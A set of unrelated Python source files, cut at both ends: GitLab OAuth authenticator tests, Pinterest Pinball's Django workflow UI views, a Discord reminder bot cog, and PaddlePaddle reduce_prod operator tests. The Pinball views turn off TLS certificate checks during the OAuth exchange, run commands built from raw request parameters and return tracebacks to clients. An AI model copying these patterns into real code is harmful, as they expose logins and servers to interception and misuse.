stderr.rstrip().rsplit('\n', 1)[-1]))
if runs % 25 == 0:
print(" %3d/%d with %3d errors" % (runs, total_tests, errors))
print('Ran pytype with %d pyis, got %d errors.' % (runs, errors))
for f, err in bad:
print('%s: %s' % (f, err))
return max_code, runs
if __name__ == '__main__':
main()
| |
import re
import json
from io import BytesIO
import functools
import collections
from urllib.parse import urlparse, parse_qs
from tornado.httpclient import HTTPResponse
from tornado.httputil import HTTPHeaders
from pytest import fixture, mark
from ..gitlab import GitLabOAuthenticator, GITLAB_API_VERSION
from .mocks import setup_oauth_mock
API_ENDPOINT = '/api/v%s' % (GITLAB_API_VERSION,)
def user_model(username, id=1, is_admin=False):
"""Return a user model"""
user = {
'username': username,
'id': id,
}
if is_admin:
# Some versions of the API do not return the is_admin property
# for non-admin users (See #115).
user['is_admin'] = True
return user
@fixture
def gitlab_client(client):
setup_oauth_mock(client,
host='gitlab.com',
access_token_path='/oauth/token',
user_path=API_ENDPOINT + '/user',
)
return client
def mock_api_version(client, version):
def mock_version_response(request):
ret = { 'version': version, 'revision': "f79c1794977" }
return HTTPResponse(request, 200,
headers={'Content-Type': 'application/json'},
buffer=BytesIO(json.dumps(ret).encode('utf-8')))
regex = re.compile(API_ENDPOINT + '/version')
client.hosts['gitlab.com'].append((regex, mock_version_response))
async def test_gitlab(gitlab_client):
authenticator = GitLabOAuthenticator()
mock_api_version(gitlab_client, '12.3.1-ee')
handler = gitlab_client.handler_for_user(user_model('wash'))
user_info = await authenticator.authenticate(handler)
assert sorted(user_info) == ['auth_state', 'name']
name = user_info['name']
assert name == 'wash'
auth_state = user_info['auth_state']
assert 'access_token' in auth_state
assert 'gitlab_user' in auth_state
def make_link_header(urlinfo, page):
return {'Link': '<{}://{}{}?page={}>;rel="next"'
.format(urlinfo.scheme, urlinfo.netloc, urlinfo.path, page)}
async def test_group_whitelist(gitlab_client):
client = gitlab_client
authenticator = GitLabOAuthenticator()
mock_api_version(client, '12.4.0-ee')
## set up fake Gitlab API
user_groups = collections.OrderedDict({
'grif': ['red', 'yellow'],
'simmons': ['red', 'yellow'],
'caboose': ['blue', 'yellow'],
'burns': ['blue', 'yellow'],
})
def group_user_model(username, is_admin=False):
return user_model(username,
list(user_groups.keys()).index(username) + 1,
is_admin)
member_regex = re.compile(API_ENDPOINT + r'/groups/(.*)/members/all/(.*)')
def is_member(request):
urlinfo = urlparse(request.url)
group, uid = member_regex.match(urlinfo.path).group(1, 2)
uname = list(user_groups.keys())[int(uid) - 1]
if group in user_groups[uname]:
return HTTPResponse(request, 200)
else:
return HTTPResponse(request, 404)
def groups(paginate, request):
urlinfo = urlparse(request.url)
_, token = request._headers.get('Authorization').split()
user = client.access_tokens[token]['username']
if not paginate:
return [{'path': group} for group in user_groups[user]]
else:
page = parse_qs(urlinfo.query).get('page', ['1'])
page = int(page[0])
return groups_paginated(user, page, urlinfo,
functools.partial(HTTPResponse, request))
def groups_paginated(user, page, urlinfo, response):
if page < len(user_groups[user]):
headers = make_link_header(urlinfo, page + 1)
elif page == len(user_groups[user]):
headers = {}
else:
return response(400)
headers.update({'Content-Type': 'application/json'})
ret = [{'path': user_groups[user][page - 1]}]
return response(200, headers=HTTPHeaders(headers),
buffer=BytesIO(json.dumps(ret).encode('utf-8')))
client.hosts['gitlab.com'].append(
(member_regex, is_member)
)
## actual tests
for paginate in (False, True):
client.hosts['gitlab.com'].append(
(API_ENDPOINT + '/groups', functools.partial(groups, paginate))
)
authenticator.gitlab_group_whitelist = ['blue']
handler = client.handler_for_user(group_user_model('caboose'))
user_info = await authenticator.authenticate(handler)
name = user_info['name']
assert name == 'caboose'
handler = client.handler_for_user(group_user_model('burns', is_admin=True))
user_info = await authenticator.authenticate(handler)
name = user_info['name']
assert name == 'burns'
handler = client.handler_for_user(group_user_model('grif'))
name = await authenticator.authenticate(handler)
assert name is None
handler = client.handler_for_user(group_user_model('simmons', is_admin=True))
name = await authenticator.authenticate(handler)
assert name is None
# reverse it, just to be safe
authenticator.gitlab_group_whitelist = ['red']
handler = client.handler_for_user(group_user_model('caboose'))
name = await authenticator.authenticate(handler)
assert name is None
handler = client.handler_for_user(group_user_model('grif'))
user_info = await authenticator.authenticate(handler)
name = user_info['name']
assert name == 'grif'
client.hosts['gitlab.com'].pop()
async def test_project_id_whitelist(gitlab_client):
client = gitlab_client
authenticator = GitLabOAuthenticator()
mock_api_version(client, '12.4.0-pre')
user_projects = {
'1231231': {
'3588673': {
'id': 3588674,
'name': 'john',
'username': 'john',
'state': 'active',
'avatar_url': 'https://secure.gravatar.com/avatar/382a6b306679b2d97b547bfff3d73242?s=80&d=identicon',
'web_url': 'https://gitlab.com/john',
'access_level': 10, # Guest
'expires_at': '2030-02-23'
},
'3588674': {
'id': 3588674,
'name': 'harry',
'username': 'harry',
'state': 'active',
'avatar_url': 'https://secure.gravatar.com/avatar/382a6b306679b2d97b547bfff3d73242?s=80&d=identicon',
'web_url': 'https://gitlab.com/harry',
'access_level': 30, # Developer
'expires_at': '2030-02-23'
}
}
}
john_user_model = user_model('john', 3588673)
harry_user_model = user_model('harry', 3588674)
sheila_user_model = user_model('sheila', 3588675)
member_regex = re.compile(API_ENDPOINT + r'/projects/(.*)/members/all/(.*)')
def is_member(request):
urlinfo = urlparse(request.url)
project_id, uid = member_regex.match(urlinfo.path).group(1, 2)
if user_projects.get(project_id) and user_projects.get(project_id).get(uid):
res = user_projects.get(project_id).get(uid)
return HTTPResponse(request=request, code=200,
buffer=BytesIO(json.dumps(res).encode('utf8')),
headers={'Content-Type': 'application/json'},
)
else:
return HTTPResponse(request=request, code=404,
buffer=BytesIO(''.encode('utf8'))
)
client.hosts['gitlab.com'].append(
(member_regex, is_member)
)
authenticator.gitlab_project_id_whitelist = [1231231]
# Forbidden since John has guest access
handler = client.handler_for_user(john_user_model)
user_info = await authenticator.authenticate(handler)
assert user_info is None
# Authenticated since Harry has developer access to the project
handler = client.handler_for_user(harry_user_model)
user_info = await authenticator.authenticate(handler)
name = user_info['name']
assert name == 'harry'
# Forbidden since Sheila doesn't have access to the project
handler = client.handler_for_user(sheila_user_model)
user_info = await authenticator.authenticate(handler)
assert user_info is None
authenticator.gitlab_project_id_whitelist = [123123152543]
# Forbidden since the project does not exist.
handler = client.handler_for_user(harry_user_model)
user_info = await authenticator.authenticate(handler)
assert user_info is None
authenticator.gitlab_project_id_whitelist = [123123152543, 1231231]
# Authenticated since Harry has developer access to one of the project in the list
handler = client.handler_for_user(harry_user_model)
user_info = await authenticator.authenticate(handler)
name = user_info['name']
assert name == 'harry'
| |
# Copyright 2015, Pinterest, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Web request handlers."""
import collections
import httplib2
import json
import socket
import traceback
import time
from django.contrib import messages
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.http import HttpResponseServerError
from django.shortcuts import render
from django.views.generic.base import TemplateView
from pinball.authentication import oauth2
from pinball.config.pinball_config import PinballConfig
from pinball.config.utils import get_log
from pinball.tools.workflow_util import run_command
from pinball.ui.cache_thread import get_workflows_json
from pinball.ui.data_builder import DataBuilder
from pinball.ui.utils import get_workflow_jobs_from_parser_by_web_viewer
from pinball.ui.workflow_graph import WorkflowGraph
from pinball.persistence.store import DbStore
from pinball.workflow.signaller import Signal
__author__ = 'Pawel Garbacki'
__copyright__ = 'Copyright 2015, Pinterest, Inc.'
__credits__ = [__author__]
__license__ = 'Apache'
__version__ = '2.0'
LOG = get_log('pinball.ui.views')
# Custom message level
SIGNIN = 35
def _serialize(elements):
elements_list = []
for element in elements:
elements_list.append(element.format())
to_serialize = {'aaData': elements_list}
return json.dumps(to_serialize)
def workflows(_):
try:
workflows_json = get_workflows_json()
except:
LOG.exception('')
return HttpResponseServerError(traceback.format_exc())
else:
return HttpResponse(workflows_json, content_type='application/json')
def instances(request):
try:
workflow = request.GET['workflow']
data_builder = DataBuilder(DbStore(), use_cache=True)
instances_data = data_builder.get_instances(workflow)
instances_json = _serialize(instances_data)
except:
LOG.exception('')
return HttpResponseServerError(traceback.format_exc())
else:
return HttpResponse(instances_json, content_type='application/json')
def jobs(request):
try:
data_builder = DataBuilder(DbStore(), use_cache=True)
workflow = request.GET['workflow']
instance = request.GET['instance']
if instance == 'latest':
instance = data_builder.get_latest_instance(workflow).instance
jobs_data = data_builder.get_jobs(workflow, instance)
jobs_json = _serialize(jobs_data)
except:
LOG.exception('')
return HttpResponseServerError(traceback.format_exc())
else:
return HttpResponse(jobs_json, content_type='application/json')
def graph(request):
try:
data_builder = DataBuilder(DbStore(), use_cache=True)
workflow = request.GET['workflow']
if 'instance' in request.GET:
instance = request.GET['instance']
if instance == 'latest':
instance = data_builder.get_latest_instance(workflow).instance
jobs_data = data_builder.get_jobs(workflow=workflow,
instance=instance)
instance_data = data_builder.get_instance(workflow=workflow,
instance=instance)
workflow_graph = WorkflowGraph(jobs_data, instance_data)
else:
workflow_graph = WorkflowGraph.from_parser(workflow)
except:
LOG.exception('')
return HttpResponseServerError(traceback.format_exc())
else:
return HttpResponse(workflow_graph.get_svg(), content_type='image/svg+xml')
def executions(request):
try:
workflow = request.GET['workflow']
instance = request.GET.get('instance')
job = request.GET['job']
data_builder = DataBuilder(DbStore())
if instance:
executions_data = data_builder.get_executions(workflow,
instance,
job)
else:
executions_data = data_builder.get_executions_across_instances(
workflow, job)
executions_json = _serialize(executions_data)
except:
LOG.exception('')
return HttpResponseServerError(traceback.format_exc())
else:
return HttpResponse(executions_json, content_type='application/json')
class ExecutionView(TemplateView):
template_name = 'execution.html'
def get_context_data(self, **kwargs):
context = super(ExecutionView, self).get_context_data(**kwargs)
workflow = self.request.GET['workflow']
instance = self.request.GET['instance']
job = self.request.GET['job']
execution = int(self.request.GET['execution'])
data_builder = DataBuilder(DbStore())
execution_data = data_builder.get_execution(workflow,
instance,
job,
execution)
formatted_data = execution_data.format()
for key, value in formatted_data.items():
context[key] = value
properties = []
for key, value in execution_data.properties.items():
properties.append('%s=%s' % (key, value))
context['properties'] = ', '.join(properties)
if not execution_data.end_time:
context['end_time'] = ''
if execution_data.exit_code is None:
context['exit_code'] = ''
return context
def file_content(request):
try:
workflow = request.GET['workflow']
instance = request.GET['instance']
job = request.GET['job']
execution = int(request.GET['execution'])
log_type = request.GET['log_type']
if execution < 0:
return HttpResponseServerError(
'execution must not be negative; got ' + execution)
data_builder = DataBuilder(DbStore())
file_data = data_builder.get_file_content(workflow, instance, job,
execution, log_type)
except:
LOG.exception('')
return HttpResponseServerError(traceback.format_exc())
else:
return HttpResponse(file_data, content_type='text/plain')
def schedules(_):
try:
data_builder = DataBuilder(DbStore())
schedules_data = data_builder.get_schedules()
schedules_json = _serialize(schedules_data)
except:
LOG.exception('')
return HttpResponseServerError(traceback.format_exc())
else:
return HttpResponse(schedules_json, content_type='application/json')
class ScheduleView(TemplateView):
template_name = 'schedule.html'
def get_context_data(self, **kwargs):
context = super(ScheduleView, self).get_context_data(**kwargs)
workflow = self.request.GET['workflow']
data_builder = DataBuilder(DbStore())
schedule_data = data_builder.get_schedule(workflow)
formatted_schedule = schedule_data.format()
for key, value in formatted_schedule.items():
context[key] = value
context['emails'] = ' '.join(schedule_data.emails)
return context
def jobs_from_config(request):
try:
workflow = request.GET['workflow']
jobs_data = get_workflow_jobs_from_parser_by_web_viewer(workflow)
jobs_json = _serialize(jobs_data)
except:
LOG.exception('')
return HttpResponseServerError(traceback.format_exc())
else:
return HttpResponse(jobs_json, content_type='application/json')
def command(request):
try:
args = {}
for key in request.GET:
args[key] = request.GET[key]
args['force'] = True
if 'workflow' not in args:
args['workflow'] = None
if 'instance' not in args:
args['instance'] = None
Options = collections.namedtuple('Options', args.keys())
options = Options(**args)
output = run_command(options)
except:
LOG.exception('')
return HttpResponseServerError(traceback.format_exc())
else:
return HttpResponse(json.dumps(output), content_type='application/json')
class TokenPathsView(TemplateView):
template_name = 'token_paths.html'
def get_context_data(self, **kwargs):
context = super(TokenPathsView, self).get_context_data(**kwargs)
path = self.request.GET['path']
if not path or not path.startswith('/'):
return context
path_elements = path.split('/')[1:]
if path.endswith('/'):
path_elements.pop()
if not path_elements:
context['basename'] = ''
else:
context['basename'] = path_elements[-1]
# A list of tuples (parent_name, parent_prefix).
parents = []
prefix = '/'
for element in path_elements[:-1]:
prefix += '%s/' % element
parents.append((element, prefix))
context['parents'] = parents
return context
def token_paths(request):
try:
path = request.GET['path']
data_builder = DataBuilder(DbStore())
tokens_data = data_builder.get_token_paths(path)
tokens_json = _serialize(tokens_data)
except:
LOG.exception('')
return HttpResponseServerError(traceback.format_exc())
else:
return HttpResponse(tokens_json, content_type='application/json')
class TokenView(TokenPathsView):
template_name = 'token.html'
def get_context_data(self, **kwargs):
context = super(TokenView, self).get_context_data(**kwargs)
token_name = self.request.GET['path']
data_builder = DataBuilder(DbStore())
token_data = data_builder.get_token(token_name)
token_format = token_data.format()
for key, value in token_format.items():
context[key] = value
return context
def _is_master_alive():
try:
s = socket.socket()
host = PinballConfig.MASTER_HOST
s.connect((host, PinballConfig.MASTER_PORT))
s.close()
except:
return False
return True
def status(request):
try:
workflow = request.GET.get('workflow')
instance = request.GET.get('instance')
data_builder = DataBuilder(DbStore())
status = []
if data_builder.is_signal_set(workflow, instance, Signal.EXIT):
status = ['exiting']
elif data_builder.is_signal_set(workflow, instance, Signal.ABORT):
status = ['aborting']
elif data_builder.is_signal_set(workflow, instance, Signal.DRAIN):
status = ['draining']
if not _is_master_alive():
status.append('no master at %s:%d' % (PinballConfig.MASTER_HOST,
PinballConfig.MASTER_PORT))
status_json = json.dumps(status)
except:
LOG.exception('')
return HttpResponseServerError(traceback.format_exc())
else:
return HttpResponse(status_json, content_type='application/json')
def signin(request):
oauth2_flow = oauth2.OAuth2Flow()
context = {'domains': oauth2_flow.get_domains(), 'STATIC_URL': PinballConfig.STATIC_URL}
if request.method == 'POST' and 'signin-domain' in request.POST.keys():
domain = request.POST.get('signin-domain')
if not oauth2_flow.domain_authenticated(domain):
messages.add_message(request, SIGNIN, 'Domain not authorized: %s.' % domain,
fail_silently=True)
return render(request, 'signin.html', context,
content_type='text/html')
else:
flow = oauth2_flow.get_flow(domain)
auth_uri = flow.step1_get_authorize_url()
return HttpResponseRedirect(auth_uri)
else:
return render(request, 'signin.html', context,
content_type='text/html')
def auth_return(request):
oauth2_flow = oauth2.OAuth2Flow()
domains = oauth2_flow.get_domains()
flow = oauth2.OAuth2Flow().get_flow(domains[1])
# disable SSL certificate validation for exchanging access code
http = httplib2.Http()
http.disable_ssl_certificate_validation = True
credential = flow.step2_exchange(request.GET.get('code'), http)
credential_token = json.loads(credential.to_json())['id_token']
if credential_token['email_verified'] and credential_token['hd'] in domains:
email = credential_token['email']
crypter = oauth2.Crypter()
encrypted_email = crypter.encrypt(email)
encrypted_domain = crypter.encrypt(credential_token['hd'])
encrypted_token = crypter.encrypt(credential.access_token)
response = HttpResponseRedirect('/')
# cookie expires after a week
response.set_cookie('login', encrypted_email, max_age=7 * 24 * 60 * 60)
response.set_cookie('domain_url', encrypted_domain, max_age=7 * 24 * 60 * 60)
response.set_cookie('user_id', email, max_age=7 * 24 * 60 * 60)
response.set_cookie('token', encrypted_token)
return response
else:
messages.add_message(request, SIGNIN, 'Authentication failed.')
response = HttpResponseRedirect('/logout/')
def logout(request):
credential_token = request.COOKIES.get('token', '')
if credential_token == '':
messages.add_message(request, SIGNIN, 'Logged out successfully.',
fail_silently=True)
return HttpResponseRedirect('/signin/')
crypter = oauth2.Crypter()
try:
logout_uri = 'https://accounts.google.com/o/oauth2/revoke?token=%s' \
% crypter.decrypt(credential_token)
except oauth2.CryptoException:
response = HttpResponseRedirect('/signin/')
else:
http = httplib2.Http()
http.disable_ssl_certificate_validation = True
resp = http.request(logout_uri, 'GET')
response = HttpResponseRedirect('/signin/')
# Need to wait for Google to process the revoke request
if resp[0].status == 200:
time.sleep(2)
response = HttpResponseRedirect('/logout/')
response.set_cookie('user_id', '')
response.set_cookie('login', '')
response.set_cookie('domain_url', '')
response.set_cookie('token', '')
return response
| |
import asyncio
from datetime import datetime, timedelta
from typing import Any, Iterable, Optional, Union
import discord
from asyncqlio.db import DatabaseInterface
from dateutil import rrule
from discord import AllowedMentions, Embed, TextChannel
from discord.ext import commands, menus
from discord.ext.commands import Cog
from discord.ext.menus import MenuKeysetPages, PageDirection, PageSpecifier
from recurrent.event_parser import RecurringEvent
from bot import BeattieBot
from context import BContext
from schema.remind import Recurring, Reminder, Table
from utils.checks import is_owner_or
from utils.converters import Time
from utils.etc import display_timedelta, reverse_insort_by_key
MINIMUM_RECURRING_DELTA = timedelta(minutes=10)
class ReminderSource(menus.KeysetPageSource):
def __init__(self, db: DatabaseInterface, user_id: int, guild_id: int):
self.db = db
self.user_id = user_id
self.guild_id = guild_id
def is_paginating(self) -> bool:
return True
async def get_page(self, specifier: PageSpecifier) -> list[Reminder]:
async with self.db.get_session() as s:
query = (
s.select(Reminder)
.where(
(Reminder.user_id == self.user_id)
& (Reminder.guild_id == self.guild_id)
)
.limit(10)
)
if specifier.reference is not None:
if specifier.direction is PageDirection.after:
query = query.where(Reminder.id > specifier.reference[-1]["id"])
else:
query = query.where(Reminder.id < specifier.reference[0]["id"])
sort_order = "asc" if specifier.direction is PageDirection.after else "desc"
query = query.order_by(Reminder.id, sort_order=sort_order)
results = [reminder async for reminder in await query.all()]
if not results:
raise ValueError
if specifier.direction is PageDirection.before:
results.reverse()
return results
async def format_page(self, _: Any, page: Iterable[Reminder]) -> Embed:
return Embed(
description="\n".join(
f'ID {row.id}: "{row.topic}" at {row.time}' for row in page
)
)
class Remind(Cog):
def __init__(self, bot: BeattieBot):
self.queue: list[Reminder] = []
self.loop = bot.loop
self.db = bot.db
self.bot = bot
self.db.bind_tables(Table)
self.timer: asyncio.Task = self.loop.create_task(asyncio.sleep(0))
self.loop.create_task(self.__init())
def cog_check(self, ctx: BContext) -> bool:
return ctx.guild is not None
def cog_unload(self) -> None:
self.timer.cancel()
async def __init(self) -> None:
await self.bot.wait_until_ready()
for table in [Reminder, Recurring]:
await table.create(if_not_exists=True) # type: ignore
async with self.db.get_session() as s:
query = s.select(Reminder).order_by(Reminder.time, sort_order="desc")
self.queue = [reminder async for reminder in await query.all()]
await self.start_timer()
@commands.group(invoke_without_command=True, usage="")
async def remind(
self,
ctx: BContext,
time: Time,
*,
topic: str = None,
) -> None:
"""Commands for setting and managing reminders."""
await self.set_reminder(ctx, time, topic=topic)
@remind.error
async def remind_error(self, ctx: BContext, e: Exception) -> None:
if ctx.invoked_subcommand is None:
await self.set_reminder_error(ctx, e)
@remind.command(name="set", aliases=["me"])
async def set_reminder(
self,
ctx: BContext,
time: Time,
*,
topic: str = None,
) -> None:
"""Have the bot remind you about something.
First put time (in quotes if there are spaces), then topic"""
time: Union[RecurringEvent, datetime] = time
if topic is None and isinstance(time, RecurringEvent):
await ctx.send("You must supply a message for a recurring reminder.")
return
if await self.process_reminder(ctx, time, topic):
await ctx.send("Okay, I'll remind you.")
@set_reminder.error
async def set_reminder_error(self, ctx: BContext, e: Exception) -> None:
if isinstance(e, (commands.BadArgument, commands.ConversionError)):
await ctx.send(
"Bad input. Valid input examples:\n"
"remind 10m pizza\n"
'remind "every week" call your mom'
)
else:
await ctx.bot.handle_error(ctx, e)
@remind.command(name="list")
async def list_reminders(self, ctx: BContext) -> None:
"""List all reminders active for you in this server."""
assert ctx.guild is not None
pages = MenuKeysetPages(
source=ReminderSource(ctx.bot.db, ctx.author.id, ctx.guild.id),
clear_reactions_after=True,
)
try:
await pages.start(ctx)
except ValueError:
await ctx.send("No reminders to show.")
@remind.command(name="delete", aliases=["remove", "del", "cancel"])
async def delete_reminder(self, ctx: BContext, reminder_id: int) -> None:
"""Delete a specific reminder. Use `list` to get IDs."""
async with ctx.bot.db.get_session() as s:
query = s.select(Reminder).where(Reminder.id == reminder_id)
reminder = await query.first()
if reminder is None:
await ctx.send("No such reminder.")
return
if reminder.user_id != ctx.author.id:
await ctx.send("That reminder belongs to someone else.")
return
await s.remove(reminder)
await s.delete(Recurring).where(Recurring.id == reminder_id)
if self.queue[-1] == reminder:
self.timer.cancel()
self.queue.pop()
await self.start_timer()
else:
self.queue.remove(reminder)
await ctx.send("Reminder deleted.")
@remind.command(name="channel")
@is_owner_or(manage_guild=True)
async def set_channel(self, ctx: BContext, channel: TextChannel = None) -> None:
"""Set the channel reminders will appear in. Invoke with no input to reset."""
assert ctx.guild is not None
await ctx.bot.config.set_guild(
ctx.guild.id, reminder_channel=channel and channel.id
)
if channel is None:
destination = "the channel they were invoked in"
else:
destination = channel.mention
await ctx.send(f"All reminders will be sent to {destination} from now on.")
async def process_reminder(
self,
ctx: BContext,
argument: Union[RecurringEvent, datetime],
topic: Optional[str],
) -> bool:
assert ctx.guild is not None
if isinstance(argument, RecurringEvent):
rr = rrule.rrulestr(argument.get_RFC_rrule())
time = rr.after(datetime.now())
next_ = rr.after(time)
if next_ - time < MINIMUM_RECURRING_DELTA:
await ctx.send(
"Recurring period too short. Minimum period is:\n"
f"{display_timedelta(MINIMUM_RECURRING_DELTA)}"
)
return False
else:
time = argument
async with self.db.get_session() as s:
reminder = await s.add(
Reminder(
guild_id=ctx.guild.id,
channel_id=ctx.channel.id,
message_id=ctx.message.id,
user_id=ctx.author.id,
time=time,
topic=topic,
)
)
if isinstance(argument, RecurringEvent):
await s.add(Recurring(id=reminder.id, rrule=argument.get_RFC_rrule()))
await self.schedule_reminder(reminder)
return True
async def schedule_reminder(self, reminder: Reminder) -> None:
if not self.queue or reminder.time < self.queue[-1].time:
self.queue.append(reminder)
self.timer.cancel()
await self.start_timer()
else:
reverse_insort_by_key(
self.queue, reminder, key=lambda r: r.time, hi=len(self.queue) - 1
)
async def send_reminder(self, reminder: Reminder) -> None:
found = False
is_recurring = False
if (
(guild := self.bot.get_guild(reminder.guild_id))
and (member := guild.get_member(reminder.user_id))
and (
channel := guild.get_channel(
(
reminder_channel_id := (
await self.bot.config.get_guild(guild.id)
).get("reminder_channel")
)
or reminder.channel_id
)
)
):
found = True
assert isinstance(channel, TextChannel)
async with self.db.get_session() as s:
query = s.select(Recurring).where(Recurring.id == reminder.id)
recurring = await query.first()
is_recurring = recurring is not None
reference = None
if is_recurring:
message = reminder.topic
else:
topic = reminder.topic or "something"
message = f"You asked to be reminded about {topic}."
if (
reminder_channel_id is None
or reminder_channel_id == reminder.channel_id
):
try:
await channel.fetch_message(reminder.message_id)
except (discord.NotFound, discord.Forbidden):
pass
else:
reference = discord.MessageReference(
message_id=reminder.message_id,
channel_id=reminder.channel_id,
guild_id=reminder.guild_id,
)
if reference is None:
message = f"{member.mention}\n{message}"
if member.permissions_in(channel).mention_everyone:
allowed_mentions = AllowedMentions.all()
else:
allowed_mentions = AllowedMentions(
everyone=False, users=[member], roles=False
)
try:
await channel.send(
message,
allowed_mentions=allowed_mentions,
reference=reference,
)
except discord.Forbidden:
pass
except Exception as e:
message = (
"An error occured in sending a reminder to "
f"{channel.guild.name}#{channel.name}"
)
self.bot.logger.exception(
message, exc_info=(type(e), e, e.__traceback__)
)
if is_recurring:
rr = rrule.rrulestr(recurring.rrule)
time = rr.after(reminder.time)
async with self.db.get_session() as s:
await s.update(Reminder).set(Reminder.time, time).where(
Reminder.id == reminder.id
)
reminder.time = time
await self.schedule_reminder(reminder)
if not is_recurring:
async with self.db.get_session() as s:
await s.remove(reminder)
if not found:
await s.delete(Recurring).where(Recurring.id == reminder.id)
async def start_timer(self) -> None:
self.timer = self.loop.create_task(self.sleep())
async def sleep(self) -> None:
while self.queue:
delta = (self.queue[-1].time - datetime.now()).total_seconds()
if delta <= 0:
await self.send_reminder(self.queue.pop())
else:
await asyncio.sleep(min(delta, 3_000_000))
def setup(bot: BeattieBot) -> None:
bot.add_cog(Remind(bot))
| |
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from paddle.fluid.tests.unittests.op_test import OpTest, skip_check_grad_ci
import paddle
import paddle.fluid.core as core
import paddle.fluid as fluid
from paddle.fluid import compiler, Program, program_guard
from paddle.fluid.framework import convert_np_dtype_to_dtype_
paddle.enable_static()
class TestNPUReduceProd(OpTest):
def setUp(self):
self.op_type = "reduce_prod"
self.set_npu()
self.init_dtype()
self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
self.attrs = {'dim': [0]}
self.outputs = {
'Out': self.inputs['X'].prod(axis=tuple(self.attrs['dim']))
}
def test_check_output(self):
self.check_output_with_place(self.place)
def set_npu(self):
self.__class__.use_npu = True
self.place = paddle.NPUPlace(0)
def init_dtype(self):
self.dtype = np.float32
class TestNPUReduceProd2(TestNPUReduceProd):
def setUp(self):
self.op_type = "reduce_prod"
self.set_npu()
self.init_dtype()
self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
self.attrs = {} # default 'dim': [0]
self.outputs = {'Out': self.inputs['X'].prod(axis=tuple([0]))}
class TestNPUReduceProd3(TestNPUReduceProd):
def setUp(self):
self.op_type = "reduce_prod"
self.set_npu()
self.init_dtype()
self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
# self.attrs = {'dim': [0]}
self.outputs = {'Out': self.inputs['X'].prod(axis=tuple([0]))}
class TestNPUReduceProd6D(TestNPUReduceProd):
def setUp(self):
self.op_type = "reduce_prod"
self.set_npu()
self.init_dtype()
self.inputs = {
'X': np.random.random((5, 6, 2, 3, 4, 2)).astype(self.dtype)
}
self.attrs = {'dim': [2, 3, 4]}
self.outputs = {
'Out': self.inputs['X'].prod(axis=tuple(self.attrs['dim']))
}
class TestNPUReduceProd8D(TestNPUReduceProd):
def setUp(self):
self.op_type = "reduce_prod"
self.set_npu()
self.init_dtype()
self.inputs = {
'X': np.random.random((2, 5, 3, 2, 2, 3, 4, 2)).astype(self.dtype)
}
self.attrs = {'dim': [2, 3, 4]}
self.outputs = {
'Out': self.inputs['X'].prod(axis=tuple(self.attrs['dim']))
}
class TestReduceAll(TestNPUReduceProd):
def setUp(self):
self.op_type = "reduce_prod"
self.set_npu()
self.init_dtype()
self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
self.attrs = {'reduce_all': True}
self.outputs = {'Out': self.inputs['X'].prod()}
class TestNPUReduceProdWithOutDtype_bool(TestNPUReduceProd):
def setUp(self):
self.op_type = "reduce_prod"
self.set_npu()
self.init_dtype()
self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
self.attrs = {'dim': [0], 'out_dtype': int(core.VarDesc.VarType.BOOL)}
self.outputs = {
'Out':
self.inputs['X'].prod(axis=tuple(self.attrs['dim'])).astype(np.bool)
}
class TestNPUReduceProdWithOutDtype_int16(TestNPUReduceProd):
def setUp(self):
self.op_type = "reduce_prod"
self.set_npu()
self.init_dtype()
self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
self.attrs = {'dim': [0], 'out_dtype': int(core.VarDesc.VarType.INT16)}
self.outputs = {
'Out': self.inputs['X'].prod(
axis=tuple(self.attrs['dim'])).astype(np.int16)
}
class TestNPUReduceProdWithOutDtype_int32(TestNPUReduceProd):
def setUp(self):
self.op_type = "reduce_prod"
self.set_npu()
self.init_dtype()
self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
self.attrs = {'dim': [0], 'out_dtype': int(core.VarDesc.VarType.INT32)}
self.outputs = {
'Out': self.inputs['X'].prod(
axis=tuple(self.attrs['dim'])).astype(np.int32)
}
class TestNPUReduceProdWithOutDtype_int64(TestNPUReduceProd):
def setUp(self):
self.op_type = "reduce_prod"
self.set_npu()
self.init_dtype()
self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
self.attrs = {'dim': [0], 'out_dtype': int(core.VarDesc.VarType.INT64)}
self.outputs = {
'Out': self.inputs['X'].prod(
axis=tuple(self.attrs['dim'])).astype(np.int64)
}
class TestNPUReduceProdWithOutDtype_fp16(TestNPUReduceProd):
def setUp(self):
self.op_type = "reduce_prod"
self.set_npu()
self.init_dtype()
self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
self.attrs = {'dim': [0], 'out_dtype': int(core.VarDesc.VarType.FP16)}
self.outputs = {
'Out': self.inputs['X'].prod(
axis=tuple(self.attrs['dim'])).astype(np.float16)
}
def test_check_output(self):
self.check_output_with_place(self.place, atol=1e-3)
class TestNPUReduceProdWithOutDtype_fp32(TestNPUReduceProd):
def setUp(self):
self.op_type = "reduce_prod"
self.set_npu()
self.init_dtype()
self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
self.attrs = {'dim': [0], 'out_dtype': int(core.VarDesc.VarType.FP32)}
self.outputs = {
'Out': self.inputs['X'].prod(
axis=tuple(self.attrs['dim'])).astype(np.float32)
}
class TestNPUReduceProdWithOutDtype_fp64(TestNPUReduceProd):
def setUp(self):
self.op_type = "reduce_prod"
self.set_npu()
self.init_dtype()
self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
